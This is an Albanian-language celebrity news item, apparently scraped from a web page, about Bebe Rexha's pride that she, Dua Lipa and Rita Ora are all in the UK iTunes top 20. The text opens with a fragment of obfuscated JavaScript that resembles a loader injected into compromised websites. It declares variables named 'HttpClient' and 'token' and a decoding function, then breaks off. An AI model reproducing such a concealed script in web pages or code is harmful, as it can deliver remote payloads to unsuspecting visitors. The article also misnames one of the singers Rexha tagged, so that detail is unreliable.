;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Bebe Rexha krenare me sukseset e Duas dhe Ritës, ja çfarë thotë për to! (FOTO)

By

Shqiptarët kudo që janë, kanë plot arsye të krenohen me vajzat që pushtuan top listat botërore me muzikën e tyre.

Dhe përpos të tjerëve, shumë krenare është edhe Bebe Rexha e cila është një shqiptare nga Dibra, babai i të cilës kishte emigruar në Shtetet e Bashkuara në fillim të viteve të 80-ta.

Këngëtaren e ka gëzuar shumë fakti që ka arritur të jetë në to 20-shen e këngëve më të dëgjuara në iTunes në Britani të Madhe, e edhe më e lumtur është shprehur të jetë për faktin se në këtë top 20-she, në majë të listës janë dhe Rita Ora e Dua Lipa me këngët e tyre më të fundit.

“Numër 13-të në iTunes të Britanisë së Madhe! Po ashtu edhe tri vajza shqiptare në top 20-she. Kjo është e pabesueshme. E di që të gjithë prindërit tanë punuan shumë për të siguruar jetë më të mirë për ne. Babai im erdhi në Amerikë në vitet e 80-ta dhe ka bërë shumë për mua. Jam shumë krenare që jam shqiptare dhe kam arritur kaq shumë, e po ashtu edhe më krenare për të gjitha vajzat shqiptare që po fitojnë me mua tani. Kjo shkon për babain tim”, ka shkruar Bebe Rexha në profilin e saj në Instagram, duke etiketuar edhe Dua Lipën e Bebe Rexhën. /Prive.al

 

Artikuj të ngjashëm